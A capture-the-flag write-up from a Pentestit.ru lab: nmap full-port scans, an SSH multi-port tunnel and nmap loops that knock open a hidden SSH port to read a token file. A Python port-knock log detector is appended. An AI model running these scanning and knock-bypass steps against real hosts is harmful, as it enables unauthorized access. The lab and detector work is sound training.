Pentestit.ru V.9 (Part 14) – Token SSH-Test – Final 14/14
So the Final Chapter arrived… 😀 I’m happy to say that this was an awesome experience, and I hope this was useful for someone else also.
This Lab is coming to an end soon, and version v10 will start: a new era, new challenges, more to learn, more to share, more difficulties to cross.
So, let's get down to business, shall we?
This was a painful one: I'm far, far away from Russia, so doing a -Pn -p0-65535 scan takes hours…
Anyway I did it and waited… xD
d.nash@tl9-ssh:~$ nmap -Pn -p 0-65535 192.168.0.7
Starting Nmap 6.00 ( http://nmap.org ) at 2016-09-22 16:16 MSK
Stats: 0:02:35 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 1.17% done; ETC: 19:56 (3:37:17 remaining)
3h and 37 minutes? Wait all this time? It kept crashing while I waited, so I quit this challenge.
Then… one day, talking with another user, he told me the server had some bug, so I went to talk with an admin to request that it be fixed, and I'm happy to say that he did a great job, fixing it the same day. 🙂
So, after that was done, I retried the same old scan, and to my happiness and surprise:
d.nash@tl9-ssh:~$ nmap -Pn -p0-65535 192.168.0.7
Starting Nmap 6.00 ( http://nmap.org ) at 2016-10-12 21:49 MSK
Nmap scan report for 192.168.0.7
Host is up (0.00065s latency).
Not shown: 65532 closed ports
PORT     STATE    SERVICE
0/tcp    filtered unknown
1941/tcp filtered unknown
1970/tcp filtered unknown
2011/tcp filtered raid-cc
Nmap done: 1 IP address (1 host up) scanned in 5.78 seconds
d.nash@tl9-ssh:~$
Really quick, see? 😉
So we got ports 0, 1941, 1970 and 2011 filtered. Strange, right? :-\
We tried to nc to port 0, and we got a different error than for the other ports.
d.nash@tl9-ssh:~$ nc 192.168.0.7 0
invalid port 0
d.nash@tl9-ssh:~$ nc 192.168.0.7 2011
(UNKNOWN) [192.168.0.7] 2011 (?) : Connection timed out
d.nash@tl9-ssh:~$
After taking a sneak peek at the write-up (yes, again :-\ – my knowledge is still very limited) I understood what port knocking is, and that it is what is implemented here.
So, I started doing some research about port knocking and how it is implemented, and got a good idea of how it works. I won't explain it here, but you can learn about it at the following link: https://www.digitalocean.com/community/tutorials/how-to-use-port-knocking-to-hide-your-ssh-daemon-from-attackers-on-ubuntu
So, we started by trying the script from the write-up, but with one change: I connected to the ssh server (the one via ssh d.nash@192.168.101.8) and from there I ran the script:
d.nash@tl9-ssh:~$ for p in 2011 1941 1970; do nmap -Pn --max-retries 0 -p $p 192.168.0.7;done
Starting Nmap 6.00 ( http://nmap.org ) at 2016-10-13 13:39 MSK
Warning: 192.168.0.7 giving up on port because retransmission cap hit (0).
Nmap scan report for 192.168.0.7
Host is up.
PORT     STATE    SERVICE
2011/tcp filtered raid-cc
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
Starting Nmap 6.00 ( http://nmap.org ) at 2016-10-13 13:39 MSK
Warning: 192.168.0.7 giving up on port because retransmission cap hit (0).
Nmap scan report for 192.168.0.7
Host is up.
PORT     STATE    SERVICE
1941/tcp filtered unknown
Nmap done: 1 IP address (1 host up) scanned in 1.10 seconds
Starting Nmap 6.00 ( http://nmap.org ) at 2016-10-13 13:39 MSK
Warning: 192.168.0.7 giving up on port because retransmission cap hit (0).
Nmap scan report for 192.168.0.7
Host is up.
PORT     STATE    SERVICE
1970/tcp filtered unknown
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
As you can see I ran this from inside the tl9-ssh host, and in another window inside the tl9-ssh host, after each sequence tryout, I ran the following:
d.nash@tl9-ssh:~$ nmap -Pn -p 22 192.168.0.7
Starting Nmap 6.00 ( http://nmap.org ) at 2016-10-13 13:40 MSK
Nmap scan report for 192.168.0.7
Host is up (0.00038s latency).
PORT   STATE  SERVICE
22/tcp closed ssh
Nmap done: 1 IP address (1 host up) scanned in 0.07 seconds
That is so that we can check whether the port knock opened the ssh port 22.
Guess what, after all the tryouts, it didn't open…
And this is where I found myself lost. I mean, why is it not working? This doesn't make sense. And the Admin told me that everything was working as it should o_0
So, I went once again to the write-up to read it closely. The write-up mentions a tunnel, and the port knock is then made via the tunnel, so I decided to try that.
After understanding how I can make a tunnel with multiple ports, I went all-in for this process and this is what I did:
Note: I’ll not post here the right sequence 😉 You can get it, I know you can 😉
So we create our tunnel:
$ sudo ssh -L 1941:192.168.0.7:1941 -L 1970:192.168.0.7:1970 -L 2011:192.168.0.7:2011 d.nash@192.168.101.8
Now just leave it open, after entering the daypass "thing".
Now in another window you run the script:
$ for p in 1970 2011 1941; do nmap -Pn --max-retries 0 -p $p 127.0.0.1;done
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-10-13 11:49 WAT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00028s latency).
PORT     STATE SERVICE
1970/tcp open  unknown
Nmap done: 1 IP address (1 host up) scanned in 0.03 seconds
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-10-13 11:49 WAT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00024s latency).
PORT     STATE SERVICE
2011/tcp open  raid-cc
Nmap done: 1 IP address (1 host up) scanned in 0.03 seconds
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-10-13 11:49 WAT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00027s latency).
PORT     STATE SERVICE
1941/tcp open  unknown
Nmap done: 1 IP address (1 host up) scanned in 0.03 seconds
Notice the differences? Now it says those ports are open… hmmm, I wonder if this means anything. Maybe yes, maybe no.
In any case, after finding the correct sequence we get the port open:
d.nash@tl9-ssh:~$ nmap -Pn -p 22 192.168.0.7
Starting Nmap 6.00 ( http://nmap.org ) at 2016-10-13 13:49 MSK
Nmap scan report for 192.168.0.7
Host is up (0.00030s latency).
PORT   STATE SERVICE
22/tcp open  ssh
Nmap done: 1 IP address (1 host up) scanned in 0.09 seconds
So, if the port is open we just need to connect there and get our token 😛
d.nash@tl9-ssh:~$ nmap -Pn -p 22 192.168.0.7
Starting Nmap 6.00 ( http://nmap.org ) at 2016-10-13 13:54 MSK
Nmap scan report for 192.168.0.7
Host is up (0.00037s latency).
PORT   STATE SERVICE
22/tcp open  ssh
Nmap done: 1 IP address (1 host up) scanned in 0.12 seconds
d.nash@tl9-ssh:~$ ssh d.nash@192.168.0.7
Linux tl9-ssh-test 3.2.0-4-amd64 #1 SMP Debian 3.2.78-1 x86_64
Last login: Thu Oct 13 13:09:28 2016 from 172.16.0.2
d.nash@tl9-ssh-test:~$ ls
token.txt
d.nash@tl9-ssh-test:~$ cat token.txt
**z**h**
Notice that after the sequence you need to be fast to check if the port is open and then connect, otherwise it may close in the meantime.
And that is it… We got our Last and Final Token 😀 \o/
This was really a nice series of challenges, and an amazing LAB experience, and I would like to thank the Pentestit.ru team especially.
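From the defender's side, the behaviour described above (the knock ports must be hit in the right order, the whole sequence within a short window, and the protected port only stays open briefly) is exactly what a log monitor should be checking. The following Python is an added example written for this write-up, not code from the lab or from the original author: it parses constructed iptables-style LOG lines and reports completed knocks, out-of-order or timed-out attempts, and connections to the protected port that were not preceded by a valid knock. The knock sequence, window, hosts and timestamps are all invented for the demonstration (the lab's real sequence is deliberately not on the page).

```python
"""Port-knock sequence detector over iptables-style LOG lines.

Added example, not part of the original write-up. Every value below
(sequence, window, hosts, timestamps) is constructed for illustration.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed knock parameters (assumptions, not the lab's real values).
KNOCK_SEQUENCE = (1970, 2011, 1941)    # ports must be hit in this order
KNOCK_WINDOW = timedelta(seconds=10)   # whole sequence must finish within this
PROTECTED_PORT = 22                    # port the knock opens
OPEN_FOR = timedelta(seconds=30)       # how long a successful knock keeps it open
YEAR = 2016                            # syslog timestamps carry no year

# Constructed firewall log lines, as `iptables -j LOG --log-prefix "KNOCK "`
# would record SYNs to the knock ports and to the protected port.
SAMPLE_LOG = """\
Oct 13 13:39:01 tl9 kernel: KNOCK IN=eth0 SRC=192.168.101.8 DST=192.168.0.7 PROTO=TCP DPT=2011 SYN
Oct 13 13:39:02 tl9 kernel: KNOCK IN=eth0 SRC=192.168.101.8 DST=192.168.0.7 PROTO=TCP DPT=1941 SYN
Oct 13 13:39:03 tl9 kernel: KNOCK IN=eth0 SRC=192.168.101.8 DST=192.168.0.7 PROTO=TCP DPT=1970 SYN
Oct 13 13:49:10 tl9 kernel: KNOCK IN=eth0 SRC=192.168.101.8 DST=192.168.0.7 PROTO=TCP DPT=1970 SYN
Oct 13 13:49:11 tl9 kernel: KNOCK IN=eth0 SRC=192.168.101.8 DST=192.168.0.7 PROTO=TCP DPT=2011 SYN
Oct 13 13:49:12 tl9 kernel: KNOCK IN=eth0 SRC=192.168.101.8 DST=192.168.0.7 PROTO=TCP DPT=1941 SYN
Oct 13 13:49:14 tl9 kernel: KNOCK IN=eth0 SRC=192.168.101.8 DST=192.168.0.7 PROTO=TCP DPT=22 SYN
Oct 13 14:00:00 tl9 kernel: KNOCK IN=eth0 SRC=10.0.0.5 DST=192.168.0.7 PROTO=TCP DPT=1970 SYN
Oct 13 14:00:30 tl9 kernel: KNOCK IN=eth0 SRC=10.0.0.5 DST=192.168.0.7 PROTO=TCP DPT=2011 SYN
Oct 13 14:00:31 tl9 kernel: KNOCK IN=eth0 SRC=10.0.0.5 DST=192.168.0.7 PROTO=TCP DPT=1941 SYN
Oct 13 14:05:00 tl9 kernel: KNOCK IN=eth0 SRC=10.0.0.5 DST=192.168.0.7 PROTO=TCP DPT=22 SYN
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) .*?SRC=(?P<src>[\d.]+) .*?DPT=(?P<dpt>\d+)"
)


def parse_line(line):
    """Return (timestamp, source ip, destination port) or None for non-matching lines."""
    m = LINE_RE.search(line)
    if not m:
        return None
    ts = datetime.strptime(f"{YEAR} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["src"], int(m["dpt"])


def detect_knocks(log_text, sequence=KNOCK_SEQUENCE, window=KNOCK_WINDOW):
    """Run a per-source state machine over the log.

    Returns (completed, failed): completed is a list of (src, ts) for full
    in-order sequences inside the window; failed lists (src, ts, reason)
    for knock-port hits that were out of order or arrived after the window.
    """
    stage = defaultdict(int)   # src -> index of the next expected port
    started = {}               # src -> time of the first knock of this attempt
    completed, failed = [], []
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, src, port = parsed
        if port not in sequence:
            continue           # protected port and others are not knocks
        # An attempt that has taken too long is abandoned before this hit is judged.
        if stage[src] > 0 and ts - started[src] > window:
            failed.append((src, ts, "timeout"))
            stage[src] = 0
        if port == sequence[stage[src]]:
            if stage[src] == 0:
                started[src] = ts
            stage[src] += 1
            if stage[src] == len(sequence):
                completed.append((src, ts))
                stage[src] = 0
        else:
            failed.append((src, ts, "wrong order"))
            # A wrong hit that happens to be the first port restarts the attempt.
            if port == sequence[0]:
                started[src] = ts
                stage[src] = 1
            else:
                stage[src] = 0
    return completed, failed


def unknocked_access(log_text, completed, protected=PROTECTED_PORT, open_for=OPEN_FOR):
    """Return (src, ts) for hits on the protected port with no valid knock
    from that source within the preceding open_for interval."""
    hits = []
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None or parsed[2] != protected:
            continue
        ts, src, _ = parsed
        knocked = any(s == src and timedelta(0) <= ts - t <= open_for for s, t in completed)
        if not knocked:
            hits.append((src, ts))
    return hits


if __name__ == "__main__":
    done, bad = detect_knocks(SAMPLE_LOG)
    for src, ts in done:
        print(f"{ts} valid knock from {src}")
    for src, ts, why in bad:
        print(f"{ts} failed knock from {src}: {why}")
    for src, ts in unknocked_access(SAMPLE_LOG, done):
        print(f"{ts} port {PROTECTED_PORT} hit from {src} without a prior knock")
```

On the constructed log, the first three lines from 192.168.101.8 are the out-of-order attempt, the next three complete the sequence, and the port 22 connection two seconds later is accepted as knocked; 10.0.0.5 starts a sequence but takes 30 seconds for the second port, so it times out, and its later port 22 hit is flagged as access without a knock. The timeout check runs before the hit is judged so that a stale partial attempt can never be completed by a late packet.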